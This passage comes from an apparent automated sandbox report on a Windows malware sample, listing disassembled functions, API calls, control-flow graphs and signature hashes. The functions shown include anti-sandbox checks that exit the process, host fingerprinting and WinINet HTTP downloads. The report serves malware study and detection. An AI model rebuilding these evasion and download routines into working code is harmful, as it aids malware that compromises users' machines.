2283->2286 2287 f66e3f call f62a20 2283->2287 2291 f66e53-f66e57 2286->2291 2292 f66e61-f66e8b call f62a20 InternetReadFile 2286->2292 2287->2286 2291->2292 2293 f66e59-f66e5b lstrcpy 2291->2293 2292->2278 2292->2282 2293->2292
                                    APIs
                                    • lstrcpy.KERNEL32(00000000,?), ref: 00F66C6F
                                    • lstrcpy.KERNEL32(00000000,00F8CFEC), ref: 00F66CC2
                                    • InternetOpenA.WININET(00F8CFEC,00000001,00000000,00000000,00000000), ref: 00F66CD5
                                    • StrCmpCA.SHLWAPI(?,00A9E928), ref: 00F66CED
                                    • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00F66D15
                                    • HttpOpenRequestA.WININET(00000000,GET,?,00A9E2C8,00000000,00000000,-00400100,00000000), ref: 00F66D50
                                    • InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00F66D77
                                    • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00F66D86
                                    • HttpQueryInfoA.WININET(00000000,00000013,?,?,00000000), ref: 00F66DA5
                                    • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00F66DFF
                                    • lstrcpy.KERNEL32(00000000,?), ref: 00F66E5B
                                    • InternetReadFile.WININET(?,00000000,000007CF,?), ref: 00F66E7D
                                    • InternetCloseHandle.WININET(00000000), ref: 00F66E8E
                                    • InternetCloseHandle.WININET(?), ref: 00F66E98
                                    • InternetCloseHandle.WININET(00000000), ref: 00F66EA2
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F66EC3
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1738932655.0000000000F61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true
                                    • Associated: 00000000.00000002.1738918094.0000000000F60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.0000000000F97000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.0000000000FEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.0000000000FF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.000000000100F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.0000000001198000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739104230.00000000011AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.00000000011AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.0000000001335000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.0000000001414000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.000000000143E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.0000000001448000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.0000000001455000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739467945.0000000001456000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739584107.00000000015F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739601018.00000000015F7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f60000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Internet$lstrcpy$CloseHandleHttp$FileOpenReadRequest$ConnectInfoOptionQuerySend
                                    • String ID: ERROR$GET
                                    • API String ID: 3687753495-3591763792
                                    • Opcode ID: 25ec9f40320d3f8487f34b2efcb769096b7c253edc0f909e21110065afdc3a64
                                    • Instruction ID: 15258aa9d7bf00b46c05e63486b52780bc82535cc76012ece1f57920fcc2e88d
                                    • Opcode Fuzzy Hash: 25ec9f40320d3f8487f34b2efcb769096b7c253edc0f909e21110065afdc3a64
                                    • Instruction Fuzzy Hash: B581B071E01619ABEB20DFA4DC49FEE77B8EF44710F144068F925EB280DB74AD449BA4
                                    Function 00F7F2F8 Relevance: 30.1, APIs: 16, Strings: 1, Instructions: 391stringCOMMON
                                    Download Yara Rule
                                    APIs
                                    • lstrlen.KERNEL32(00A85B10), ref: 00F7F315
                                    • lstrcpy.KERNEL32(00000000,?), ref: 00F7F3A3
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F7F3C7
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F7F47B
                                    • lstrcpy.KERNEL32(00000000,00A85B10), ref: 00F7F4BB
                                    • lstrcpy.KERNEL32(00000000,00A98F18), ref: 00F7F4EA
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F7F59E
                                    • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00F7F61C
                                    • lstrcpy.KERNEL32(00000000,?), ref: 00F7F64C
                                    • lstrcpy.KERNEL32(00000000,?), ref: 00F7F69A
                                    • StrCmpCA.SHLWAPI(?,ERROR), ref: 00F7F718
                                    • lstrlen.KERNEL32(00A98FE8), ref: 00F7F746
                                    • lstrcpy.KERNEL32(00000000,00A98FE8), ref: 00F7F771
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F7F793
                                    • lstrcpy.KERNEL32(00000000,?), ref: 00F7F7E4
                                    • StrCmpCA.SHLWAPI(?,ERROR), ref: 00F7FA32
                                    • lstrlen.KERNEL32(00A98FA8), ref: 00F7FA60
                                    • lstrcpy.KERNEL32(00000000,00A98FA8), ref: 00F7FA8B
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F7FAAD
                                    • lstrcpy.KERNEL32(00000000,?), ref: 00F7FAFE
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1738932655.0000000000F61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true
                                    • Associated: 00000000.00000002.1738918094.0000000000F60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.0000000000F97000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.0000000000FEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.0000000000FF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.000000000100F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.0000000001198000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739104230.00000000011AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.00000000011AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.0000000001335000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.0000000001414000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.000000000143E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.0000000001448000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.0000000001455000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739467945.0000000001456000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739584107.00000000015F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739601018.00000000015F7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f60000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy$lstrlen
                                    • String ID: ERROR
                                    • API String ID: 367037083-2861137601
                                    • Opcode ID: 5319c622088c8ac5f0a67395a5cfc3703ff15a8021471f8637b45ae4fa2609de
                                    • Instruction ID: 9702d9054104e335fe6535da42a7f921ff031883fe89f44c20de2d0a5f390eda
                                    • Opcode Fuzzy Hash: 5319c622088c8ac5f0a67395a5cfc3703ff15a8021471f8637b45ae4fa2609de
                                    • Instruction Fuzzy Hash: 0CF13A70E01205CFDB68CF69C484A29B7E5BF48324B18C0BED82D9B255E735DC86EB52
                                    Function 00F78CA0 Relevance: 29.9, APIs: 16, Strings: 1, Instructions: 176COMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 2721 f78ca0-f78cc4 StrCmpCA 2722 f78cc6-f78cc7 ExitProcess 2721->2722 2723 f78ccd-f78ce6 2721->2723 2725 f78ee2-f78eef call f62a20 2723->2725 2726 f78cec-f78cf1 2723->2726 2728 f78cf6-f78cf9 2726->2728 2729 f78ec3-f78edc 2728->2729 2730 f78cff 2728->2730 2729->2725 2764 f78cf3 2729->2764 2732 f78e56-f78e64 StrCmpCA 2730->2732 2733 f78d30-f78d3f lstrlen 2730->2733 2734 f78dbd-f78dcb StrCmpCA 2730->2734 2735 f78ddd-f78deb StrCmpCA 2730->2735 2736 f78dfd-f78e0b StrCmpCA 2730->2736 2737 f78e1d-f78e2b StrCmpCA 2730->2737 2738 f78e3d-f78e4b StrCmpCA 2730->2738 2739 f78d5a-f78d69 lstrlen 2730->2739 2740 f78d06-f78d15 lstrlen 2730->2740 2741 f78d84-f78d92 StrCmpCA 2730->2741 2742 f78da4-f78db8 StrCmpCA 2730->2742 2743 f78e6f-f78e7d StrCmpCA 2730->2743 2744 f78e88-f78e9a lstrlen 2730->2744 2732->2729 2756 f78e66-f78e6d 2732->2756 2760 f78d41-f78d46 call f62a20 2733->2760 2761 f78d49-f78d55 call f62930 2733->2761 2734->2729 2749 f78dd1-f78dd8 2734->2749 2735->2729 2750 f78df1-f78df8 2735->2750 2736->2729 2751 f78e11-f78e18 2736->2751 2737->2729 2752 f78e31-f78e38 2737->2752 2738->2729 2753 f78e4d-f78e54 2738->2753 2745 f78d73-f78d7f call f62930 2739->2745 2746 f78d6b-f78d70 call f62a20 2739->2746 2754 f78d17-f78d1c call f62a20 2740->2754 2755 f78d1f-f78d2b call f62930 2740->2755 2741->2729 2748 f78d98-f78d9f 2741->2748 2742->2729 2743->2729 2757 f78e7f-f78e86 2743->2757 2758 f78ea4-f78eb0 call f62930 2744->2758 2759 f78e9c-f78ea1 call f62a20 2744->2759 2779 f78eb3-f78eb5 2745->2779 2746->2745 2748->2729 2749->2729 2750->2729 2751->2729 2752->2729 2753->2729 2754->2755 2755->2779 2756->2729 2757->2729 2758->2779 2759->2758 2760->2761 2761->2779 2764->2728 2779->2729 2780 f78eb7-f78eb9 2779->2780 2780->2729 2781 f78ebb-f78ebd lstrcpy 2780->2781 2781->2729
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1738932655.0000000000F61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true
                                    • Associated: 00000000.00000002.1738918094.0000000000F60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.0000000000F97000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.0000000000FEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.0000000000FF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.000000000100F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.0000000001198000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739104230.00000000011AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.00000000011AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.0000000001335000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.0000000001414000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.000000000143E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.0000000001448000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.0000000001455000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739467945.0000000001456000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739584107.00000000015F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739601018.00000000015F7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f60000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ExitProcess
                                    • String ID: block
                                    • API String ID: 621844428-2199623458
                                    • Opcode ID: 68258f3cdae9a89ea9b11f9de9b4d8ae83dbbc40298db1976d07491841ef591c
                                    • Instruction ID: 859cb5a2bdb0411765e38b5ed5e5cf5762a1740e5f52975a811cfc2daef72c0e
                                    • Opcode Fuzzy Hash: 68258f3cdae9a89ea9b11f9de9b4d8ae83dbbc40298db1976d07491841ef591c
                                    • Instruction Fuzzy Hash: EC519371D44705DFDB209FB5D988E2B7BF8BB54744B10882EE566C2600DB78E443BB22
                                    Function 00F82740 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 93memoryCOMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 2782 f82740-f82783 GetWindowsDirectoryA 2783 f8278c-f827ea GetVolumeInformationA 2782->2783 2784 f82785 2782->2784 2785 f827ec-f827f2 2783->2785 2784->2783 2786 f82809-f82820 GetProcessHeap RtlAllocateHeap 2785->2786 2787 f827f4-f82807 2785->2787 2788 f82822-f82824 2786->2788 2789 f82826-f82844 wsprintfA 2786->2789 2787->2785 2790 f8285b-f82872 call f871e0 2788->2790 2789->2790
                                    APIs
                                    • GetWindowsDirectoryA.KERNEL32(00000000,00000104,00000000,00000000,00000000), ref: 00F8277B
                                    • GetVolumeInformationA.KERNEL32(?,00000000,00000000,00F793B6,00000000,00000000,00000000,00000000), ref: 00F827AC
                                    • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00F8280F
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 00F82816
                                    • wsprintfA.USER32 ref: 00F8283B
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1738932655.0000000000F61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true
                                    • Associated: 00000000.00000002.1738918094.0000000000F60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.0000000000F97000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.0000000000FEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.0000000000FF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.000000000100F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.0000000001198000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739104230.00000000011AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.00000000011AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.0000000001335000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.0000000001414000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.000000000143E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.0000000001448000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.0000000001455000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739467945.0000000001456000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739584107.00000000015F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739601018.00000000015F7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f60000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Heap$AllocateDirectoryInformationProcessVolumeWindowswsprintf
                                    • String ID: :\$C
                                    • API String ID: 2572753744-3309953409
                                    • Opcode ID: 73ea2146eef0a21b91bd5503ed49fa1eda4107a2ed2f6e3ba07418038b49d338
                                    • Instruction ID: f680e3507e5e8f3926dbc18843fbb1c4b60a456917c400a1bf5826fe3aaa3262
                                    • Opcode Fuzzy Hash: 73ea2146eef0a21b91bd5503ed49fa1eda4107a2ed2f6e3ba07418038b49d338
                                    • Instruction Fuzzy Hash: ED3172B2D042099FCB14DFB98985AEFBFBCEF59710F10016AE515F7644E2349A408BA1
                                    Function 00F64BC0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 50stringnetworkCOMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 2793 f64bc0-f64bce 2794 f64bd0-f64bd5 2793->2794 2794->2794 2795 f64bd7-f64c48 ??2@YAPAXI@Z * 3 lstrlen InternetCrackUrlA call f62a20 2794->2795
                                    APIs
                                    • ??2@YAPAXI@Z.MSVCRT(00000800,?), ref: 00F64BF7
                                    • ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00F64C01
                                    • ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00F64C0B
                                    • lstrlen.KERNEL32(?,00000000,?), ref: 00F64C1F
                                    • InternetCrackUrlA.WININET(?,00000000), ref: 00F64C27
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1738932655.0000000000F61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true
                                    • Associated: 00000000.00000002.1738918094.0000000000F60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.0000000000F97000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.0000000000FEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.0000000000FF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.000000000100F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.0000000001198000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739104230.00000000011AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.00000000011AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.0000000001335000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.0000000001414000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.000000000143E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.0000000001448000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.0000000001455000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739467945.0000000001456000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739584107.00000000015F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739601018.00000000015F7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f60000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ??2@$CrackInternetlstrlen
                                    • String ID: <
                                    • API String ID: 1683549937-4251816714
                                    • Opcode ID: a3b878ebe56e665116151d89abdb7bfdbf925aab8d08c69ec5f704329f0dd18e
                                    • Instruction ID: 2ae52f23f78619486431dedf59953bab29bb0b337c05149e58436cebd68ed0d5
                                    • Opcode Fuzzy Hash: a3b878ebe56e665116151d89abdb7bfdbf925aab8d08c69ec5f704329f0dd18e
                                    • Instruction Fuzzy Hash: 0E014071D00218AFDB14DFA8EC45B9EBBB8EB49320F004126F924E7390EB7459048FD5
                                    Function 00F61030 Relevance: 7.6, APIs: 5, Instructions: 55memoryCOMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 2798 f61030-f61055 GetCurrentProcess VirtualAllocExNuma 2799 f61057-f61058 ExitProcess 2798->2799 2800 f6105e-f6107b VirtualAlloc 2798->2800 2801 f61082-f61088 2800->2801 2802 f6107d-f61080 2800->2802 2803 f610b1-f610b6 2801->2803 2804 f6108a-f610ab VirtualFree 2801->2804 2802->2801 2804->2803
                                    APIs
                                    • GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 00F61046
                                    • VirtualAllocExNuma.KERNEL32(00000000), ref: 00F6104D
                                    • ExitProcess.KERNEL32 ref: 00F61058
                                    • VirtualAlloc.KERNEL32(00000000,17C841C0,00003000,00000004), ref: 00F6106C
                                    • VirtualFree.KERNEL32(00000000,17C841C0,00008000), ref: 00F610AB
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1738932655.0000000000F61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true
                                    • Associated: 00000000.00000002.1738918094.0000000000F60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.0000000000F97000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.0000000000FEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.0000000000FF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.000000000100F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.0000000001198000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739104230.00000000011AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.00000000011AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.0000000001335000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.0000000001414000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.000000000143E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.0000000001448000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.0000000001455000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739467945.0000000001456000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739584107.00000000015F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739601018.00000000015F7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f60000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Virtual$AllocProcess$CurrentExitFreeNuma
                                    • String ID:
                                    • API String ID: 3477276466-0
                                    • Opcode ID: d23e4fb6c38e4fdb58a11412c86dc8706b11ed99e42c114009a25e80f2f845ac
                                    • Instruction ID: 3dfaa852bc1967dc0f670f018bd186d18d36143bbccc4eaae87a7c7fd351235b
                                    • Opcode Fuzzy Hash: d23e4fb6c38e4fdb58a11412c86dc8706b11ed99e42c114009a25e80f2f845ac
                                    • Instruction Fuzzy Hash: C901F4B17403087BEB384A756C5AF6B77ADB785B15F248028F724E72C0D9B2E9409664
                                    Function 00F7EE90 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84stringCOMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 2805 f7ee90-f7eeb5 call f62930 2808 f7eeb7-f7eebf 2805->2808 2809 f7eec9-f7eecd call f66c40 2805->2809 2808->2809 2810 f7eec1-f7eec3 lstrcpy 2808->2810 2812 f7eed2-f7eee8 StrCmpCA 2809->2812 2810->2809 2813 f7ef11-f7ef18 call f62a20 2812->2813 2814 f7eeea-f7ef02 call f62a20 call f62930 2812->2814 2820 f7ef20-f7ef28 2813->2820 2823 f7ef45-f7efa0 call f62a20 * 10 2814->2823 2824 f7ef04-f7ef0c 2814->2824 2820->2820 2822 f7ef2a-f7ef37 call f62930 2820->2822 2822->2823 2831 f7ef39 2822->2831 2824->2823 2827 f7ef0e-f7ef0f 2824->2827 2830 f7ef3e-f7ef3f lstrcpy 2827->2830 2830->2823 2831->2830
                                    APIs
                                    • lstrcpy.KERNEL32(00000000,?), ref: 00F7EEC3
                                    • StrCmpCA.SHLWAPI(?,ERROR), ref: 00F7EEDE
                                    • lstrcpy.KERNEL32(00000000,ERROR), ref: 00F7EF3F
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1738932655.0000000000F61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true
                                    • Associated: 00000000.00000002.1738918094.0000000000F60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.0000000000F97000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.0000000000FEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.0000000000FF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.000000000100F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.0000000001198000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739104230.00000000011AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.00000000011AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.0000000001335000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.0000000001414000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.000000000143E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.0000000001448000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.0000000001455000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739467945.0000000001456000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739584107.00000000015F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739601018.00000000015F7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f60000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy
                                    • String ID: ERROR
                                    • API String ID: 3722407311-2861137601
                                    • Opcode ID: e728f5608837c06a1629c60b7e2c67fa9cee3feb11b44b997d1524a33766d5e2
                                    • Instruction ID: 525f9847481c18d172969d30e997be4fccb81eb0c717dda29da2a2367392b803
                                    • Opcode Fuzzy Hash: e728f5608837c06a1629c60b7e2c67fa9cee3feb11b44b997d1524a33766d5e2
                                    • Instruction Fuzzy Hash: 0D217130A216059BCB61FFB8DD56A9E37A4AF14304F088469F85ACB602DB7CEC00B791
                                    Function 00F610C0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 32COMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 2886 f610c0-f610cb 2887 f610d0-f610dc 2886->2887 2889 f610de-f610f3 GlobalMemoryStatusEx 2887->2889 2890 f610f5-f61106 2889->2890 2891 f61112-f61114 ExitProcess 2889->2891 2892 f6111a-f6111d 2890->2892 2893 f61108 2890->2893 2893->2891 2894 f6110a-f61110 2893->2894 2894->2891 2894->2892
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1738932655.0000000000F61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true
                                    • Associated: 00000000.00000002.1738918094.0000000000F60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.0000000000F97000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.0000000000FEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.0000000000FF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.000000000100F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.0000000001198000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739104230.00000000011AA000.00000004.00000001.01000000.00000003.sdmpDownload File
